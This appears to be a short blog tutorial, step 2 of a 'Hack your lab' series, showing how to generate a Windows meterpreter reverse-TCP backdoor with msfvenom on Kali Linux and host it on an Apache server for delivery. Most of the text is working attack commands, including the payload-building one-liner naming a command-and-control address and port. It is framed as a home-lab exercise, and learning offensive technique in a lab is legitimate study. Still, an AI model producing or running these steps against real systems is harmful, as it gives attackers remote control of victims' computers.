Hack your lab – Step 2 – Make your own backdoor

      Comments Off on Hack your lab – Step 2 – Make your own backdoor

In step 1 You have setup the LAB. Now it is time to create a simple backdoor. Login into your KALI Linux box (root/toor) and open a terminal.

With the commandline utility msfvenom you are able to create your own payloads or integrate them in existing executable files. Let’s start with the easy level.

If you want to see all the options you can use msfvenom -h

to create your first backdoor use this command

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > backdoor.exe

this command will create an executable file which will connect to our Command & Control Center (Kali Linux) on ip adress 10.10.10.30 with port 4444

the backdoor.exe is placed in your home folder /root/

copy the file to var/www/html/

cp /root/backdoor.exe /var/www/html/backdoor.exe

start the built-in apache server with the command

service apache2 start

Now we are all set to use the backdoor!